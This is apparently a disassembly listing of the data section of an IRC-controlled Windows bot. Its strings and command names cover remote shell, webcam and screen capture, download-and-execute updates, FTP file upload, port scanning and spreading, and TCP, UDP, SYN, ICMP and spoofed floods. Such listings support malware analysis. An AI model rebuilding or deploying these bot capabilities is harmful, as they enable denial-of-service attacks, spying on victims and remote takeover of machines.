db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 10h
unk_42CAB0 db 2Dh ; - ; DATA XREF: sub_40274D+77AD�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 4
unk_42CAD4 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409EC6�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_42CAFC db 2Dh ; - ; DATA XREF: sub_40274D+776F�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_40274D+7755�o
unk_42CB28 db 2Dh ; - ; DATA XREF: sub_40274D+7625�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 10h
unk_42CB50 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409D59�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_42CB74 db 2Dh ; - ; DATA XREF: sub_40274D+7602�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 4
; char asc_42CB94[]
asc_42CB94 db '-' ; DATA XREF: sub_40274D+75D5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 4
unk_42CBBC db 2Dh ; - ; DATA XREF: sub_40274D:loc_409D02�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 4
; char asc_42CBE4[]
asc_42CBE4 db '-' ; DATA XREF: sub_40274D+758A�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_42CC04 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409C9A�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 4
unk_42CC34 db 2Dh ; - ; DATA XREF: sub_40274D+7543�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
; char asc_42CC54[]
asc_42CC54 db '-' ; DATA XREF: sub_40274D:loc_409C3F�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
unk_42CC84 db 2Dh ; - ; DATA XREF: sub_40274D+74EB�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 4
dword_42CCA8 dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h
; DATA XREF: sub_40274D+74A0�o
dd 27732527h, 2Eh
; char asc_42CCC4[]
asc_42CCC4 db '-' ; DATA XREF: sub_40274D+7423�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
dword_42CCE8 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_40274D+73AF�o
dd 0
; char asc_42CD00[]
asc_42CD00 db '-' ; DATA XREF: sub_40274D+736F�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
align 10h
; char asc_42CD40[]
asc_42CD40 db '-' ; DATA XREF: sub_40274D+7316�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 4C525520h, 7325203Ah, 2Eh
; char asc_42CD58[]
asc_42CD58 db '-' ; DATA XREF: sub_40274D:loc_4099C3�o
db 3, 34h, 2
dd 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h, 746E6573h
dd 2Eh
unk_42CD74 db 2Dh ; - ; DATA XREF: sub_40274D+726F�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
; char asc_42CD94[]
asc_42CD94 db '-' ; DATA XREF: sub_40274D+7230�o
db 3, 34h, 2
dd 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh, 732520h
unk_42CDAC db 2Dh ; - ; DATA XREF: sub_40274D+7228�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
; char asc_42CDD8[]
asc_42CDD8 db 0Ah,0 ; DATA XREF: sub_40274D+720A�o
; sub_412135+29�o ...
align 4
unk_42CDDC db 2Dh ; - ; DATA XREF: sub_40274D+71E0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileFailed db 'Read file failed: %s',0
align 10h
; char asc_42CE00[]
asc_42CE00 db '-' ; DATA XREF: sub_40274D+71CA�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 4
unk_42CE24 db 2Dh ; - ; DATA XREF: sub_40274D:loc_40989F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for amateur video capture.',0
align 8
unk_42CE68 db 2Dh ; - ; DATA XREF: sub_40274D:loc_409895�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing amateur video from webcam.',0
; char asc_42CEA8[]
asc_42CEA8 db '-' ; DATA XREF: sub_40274D+7135�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 4
; char aVideo[]
aVideo db 'video',0 ; DATA XREF: sub_40274D:loc_4097FE�o
align 4
; char asc_42CEDC[]
asc_42CEDC db '-' ; DATA XREF: sub_40274D:loc_4097EB�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_1 db '- Invalid parameters for webcam capture.',0
align 4
unk_42CF14 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4097E4�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 4
; char asc_42CF48[]
asc_42CF48 db '-' ; DATA XREF: sub_40274D+7087�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
; char aFrame[]
aFrame db 'frame',0 ; DATA XREF: sub_40274D:loc_409770�o
align 4
; char asc_42CF7C[]
asc_42CF7C db '-' ; DATA XREF: sub_40274D+7016�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
; char asc_42CFA4[]
asc_42CFA4 db '-' ; DATA XREF: sub_40274D+6FE6�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 4
; char aDrivers[]
aDrivers db 'drivers',0 ; DATA XREF: sub_40274D:loc_4096E6�o
; char asc_42CFD4[]
asc_42CFD4 db '-' ; DATA XREF: sub_40274D:loc_4096D3�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 10h
unk_42D010 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4096CC�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing screen.',0
align 10h
; char asc_42D040[]
asc_42D040 db '-' ; DATA XREF: sub_40274D+6F6F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
; char aScreen[]
aScreen db 'screen',0 ; DATA XREF: sub_40274D:loc_40968E�o
align 4
; char asc_42D074[]
asc_42D074 db '-' ; DATA XREF: sub_40274D+6F29�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh, 2E732520h
dd 0
; char asc_42D090[]
asc_42D090 db '-' ; DATA XREF: sub_40274D:loc_409636�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 10h
; char asc_42D0C0[]
asc_42D0C0 db '-' ; DATA XREF: sub_40274D+6ED3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 4
; char asc_42D0E8[]
asc_42D0E8 db '-' ; DATA XREF: sub_40274D+6E3F�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 4
; char asc_42D108[]
asc_42D108 db '-' ; DATA XREF: sub_40274D+6DFF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 4
; char asc_42D128[]
asc_42D128 db '-' ; DATA XREF: sub_40274D+6DA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
dword_42D144 dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_40274D+6D36�o
; char aPartS_1[]
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6CFF�o
; sub_40274D+7831�o
align 4
unk_42D164 db 2Dh ; - ; DATA XREF: sub_40274D+6CDD�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
; char aModeS_0[]
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6CCF�o
align 4
dword_42D18C dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_40274D+6CA4�o
dd 25203A29h, 73h
dword_42D1A8 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_40274D+6C38�o
dd 203A2973h, 7325h
; char aModeS[]
aModeS db 'MODE %s',0 ; DATA XREF: sub_40274D+6BE0�o
dword_42D1CC dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_40274D+6BB5�o
dd 203A2973h, 7325h
; char aS_0[]
aS_0 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+6B96�o
; sub_40274D+6C19�o ...
align 10h
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_40274D+6B3F�o
align 4
; char aPartS_0[]
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_40274D+6AFD�o
; char asc_42D204[]
asc_42D204 db '-' ; DATA XREF: sub_40274D+6AB3�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42D240[]
asc_42D240 db '-' ; DATA XREF: sub_40274D+6A54�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 4
unk_42D26C db 2Dh ; - ; DATA XREF: sub_40274D+69E5�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42D2A8[]
asc_42D2A8 db '-' ; DATA XREF: sub_40274D+6986�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_42D2DC db 2Dh ; - ; DATA XREF: sub_40274D:loc_409079�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 10h
; char asc_42D310[]
asc_42D310 db '-' ; DATA XREF: sub_40274D+68F1�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 65706552h, 203A7461h, 7325h
dword_42D328 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_40274D:loc_408FB6�o
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_40274D+6825�o
; sub_40274D+68CB�o ...
align 10h
dword_42D350 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_40274D:loc_408F2F�o
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
dword_42D398 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_40274D+67C3�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
; char asc_42D3D4[]
asc_42D3D4 db '-' ; DATA XREF: sub_40274D+676A�o
db 3, 34h, 2
dd 61647075h, 3026574h
aDownloadingUpd db '- Downloading update from: %s.',0
align 10h
; char aSS_exe[]
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40274D+66CB�o
align 4
dword_42D40C dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_40274D+666C�o
dd 7325203Ah, 0
unk_42D428 db 2Dh ; - ; DATA XREF: sub_40274D+6661�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
; char asc_42D44C[]
asc_42D44C db '-' ; DATA XREF: sub_40274D+65AF�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToStartS db 'Failed to start search thread, error: <%d>.',0
; char asc_42D488[]
asc_42D488 db '-' ; DATA XREF: sub_40274D+654B�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
dword_42D4B8 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_40274D:loc_408BFD�o
; sub_40274D:loc_409BF4�o
; char asc_42D4C4[]
asc_42D4C4 db '-' ; DATA XREF: sub_40274D+6498�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_42D4E8 db 2Dh ; - ; DATA XREF: sub_40274D:loc_408BC3�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 10h
unk_42D520 db 2Dh ; - ; DATA XREF: sub_40274D+6457�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToStar_1 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42D558[]
asc_42D558 db '-' ; DATA XREF: sub_40274D+63ED�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
dword_42D584 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_40274D+636A�o
aFailedToStar_2 db '- Failed to start clone thread, error: <%d>.',0
align 10h
; char asc_42D5C0[]
asc_42D5C0 db '-' ; DATA XREF: sub_40274D+6307�o
db 3, 34h, 2
dd 6E6F6C63h, 3027365h
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 10h
; char asc_42D5F0[]
asc_42D5F0 db '-' ; DATA XREF: sub_40274D+625F�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToStar_3 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42D628[]
asc_42D628 db '-' ; DATA XREF: sub_40274D+61FD�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42D658 db 2Dh ; - ; DATA XREF: sub_40274D+616A�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToStar_4 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42D690[]
asc_42D690 db '-' ; DATA XREF: sub_40274D+6108�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 10h
unk_42D6C0 db 2Dh ; - ; DATA XREF: sub_40274D+6086�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToStar_5 db 'Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42D6F8[]
asc_42D6F8 db '-' ; DATA XREF: sub_40274D+6024�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_42D734 db 2Dh ; - ; DATA XREF: sub_40274D+5FA2�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0
align 4
; char asc_42D774[]
asc_42D774 db '-' ; DATA XREF: sub_40274D+5F49�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_42D7A0 db 2Dh ; - ; DATA XREF: sub_40274D+5E6B�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
; char asc_42D7E4[]
asc_42D7E4 db '-' ; DATA XREF: sub_40274D+5E12�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
; char asc_42D820[]
asc_42D820 db '-' ; DATA XREF: sub_40274D+5D1C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0
align 4
; char aSSS_1[]
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_40274D+5C76�o
align 4
aSSS_0 db '[%s] * %s %s',0 ; DATA XREF: sub_40274D+5B99�o
align 4
; char dword_42D87C
dword_42D87C dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40274D+5B05�o
; sub_40274D+6D82�o
unk_42D888 db 2Dh ; - ; DATA XREF: sub_40274D+5A8F�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_6 db 'Failed to start scan thread, error: <%d>.',0
align 8
; char asc_42D8C8[]
asc_42D8C8 db '-' ; DATA XREF: sub_40274D+5A36�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 4
unk_42D918 db 2Dh ; - ; DATA XREF: sub_40274D+598D�o
; sub_40274D+5D75�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0
align 10h
; char asc_42D950[]
asc_42D950 db '-' ; DATA XREF: sub_40274D+5934�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanStart db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 4
unk_42D9B8 db 2Dh ; - ; DATA XREF: sub_40274D+57C0�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_8 db 'Failed to start scan, no IP specified.',0
align 4
unk_42D9EC db 2Dh ; - ; DATA XREF: sub_40274D+5763�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_9 db 'Failed to start scan, port is invalid.',0
align 10h
; char asc_42DA20[]
asc_42DA20 db '-' ; DATA XREF: sub_40274D:loc_407D92�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s failed.',0
align 10h
unk_42DA50 db 2Dh ; - ; DATA XREF: sub_40274D+563E�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s',0
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40274D+5625�o
; char aSS_2[]
aSS_2 db '-s:%s',0 ; DATA XREF: sub_40274D+560E�o
align 4
; char aOpenSSSSPutSBy[]
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40274D+55EE�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
; char aAb[]
aAb db 'ab',0 ; DATA XREF: sub_40274D+55CA�o
; sub_414B1C+4E�o
align 10h
; char aSIII_dll[]
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40274D+55B9�o
align 10h
; char asc_42DAC0[]
asc_42DAC0 db '-' ; DATA XREF: sub_40274D+5560�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 10h
; char aUpload[]
aUpload db 'upload',0 ; DATA XREF: sub_40274D+553D�o
align 4
; char asc_42DAE8[]
asc_42DAE8 db '-' ; DATA XREF: sub_40274D+550A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScanni db 'Already %d scanning threads. Too many specified.',0
align 4
unk_42DB28 db 2Dh ; - ; DATA XREF: sub_40274D+54C2�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_10 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42DB60[]
asc_42DB60 db '-' ; DATA XREF: sub_40274D+5463�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
unk_42DBA8 db 2Dh ; - ; DATA XREF: sub_40274D+53AD�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 4
; char asc_42DBDC[]
asc_42DBDC db '-' ; DATA XREF: sub_40274D+537C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 10h
unk_42DC10 db 2Dh ; - ; DATA XREF: sub_40274D+536C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
; char asc_42DC48[]
asc_42DC48 db '-' ; DATA XREF: sub_40274D+52BF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
; char aIcmp_dllNotAva[]
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40274D+52A2�o
align 4
unk_42DC9C db 2Dh ; - ; DATA XREF: sub_40274D+5278�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_11 db 'Failed to start flood thread, error: <%d>.',0
align 8
; char asc_42DCD8[]
asc_42DCD8 db '-' ; DATA XREF: sub_40274D+521F�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 10h
; char asc_42DD20[]
asc_42DD20 db '-' ; DATA XREF: sub_40274D:loc_4078C4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_42DD58 db 2Dh ; - ; DATA XREF: sub_40274D+5158�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_12 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char asc_42DD90[]
asc_42DD90 db '-' ; DATA XREF: sub_40274D+50F4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_40274D+50E4�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40274D+50DD�o
unk_42DDD4 db 2Dh ; - ; DATA XREF: sub_40274D+504B�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 10h
; char aRandom_0[]
aRandom_0 db 'random',0 ; DATA XREF: sub_40274D+503B�o
; sub_416B1E+212�o
align 4
; char aAck[]
aAck db 'ack',0 ; DATA XREF: sub_40274D+5024�o
; sub_416B1E+1F2�o
; char aHcon[]
aHcon db 'hcon',0 ; DATA XREF: sub_40274D+4FB1�o
align 4
; char aHttpcon[]
aHttpcon db 'httpcon',0 ; DATA XREF: sub_40274D+4F9E�o
; char asc_42DE1C[]
asc_42DE1C db '-' ; DATA XREF: sub_40274D+4F82�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 10h
; char aHeloRndnickMai[]
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40274D+4F0E�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
; char aEmail[]
aEmail db 'email',0 ; DATA XREF: sub_40274D+4E23�o
align 4
; char aTcp[]
aTcp db 'tcp',0 ; DATA XREF: sub_40274D+4E0C�o
; char aTcpflood[]
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_40274D+4DF5�o
align 4
; char aP[]
aP: ; DATA XREF: sub_40274D+4DDE�o
; .data:00442EF0�o ...
unicode 0, <p>,0
; char aPing_0[]
aPing_0 db 'ping',0 ; DATA XREF: sub_40274D+4DC7�o
align 10h
; char aPingflood[]
aPingflood db 'pingflood',0 ; DATA XREF: sub_40274D+4DB0�o
align 4
; char aNs[]
aNs db 'ns',0 ; DATA XREF: sub_40274D+4D99�o
align 10h
; char aNetsend[]
aNetsend db 'netsend',0 ; DATA XREF: sub_40274D+4D82�o
; char aU[]
aU: ; DATA XREF: sub_40274D+4D6B�o
; .data:00442EE8�o ...
unicode 0, <u>,0
; char aUdp[]
aUdp db 'udp',0 ; DATA XREF: sub_40274D+4D54�o
; char aUdpflood[]
aUdpflood db 'udpflood',0 ; DATA XREF: sub_40274D+4D3D�o
align 4
; char aAsc[]
aAsc db 'asc',0 ; DATA XREF: sub_40274D+4D26�o
; char aAdvscan[]
aAdvscan db 'advscan',0 ; DATA XREF: sub_40274D+4D0F�o
; char aPsc[]
aPsc db 'psc',0 ; DATA XREF: sub_40274D+4CF8�o
; char aPortscan[]
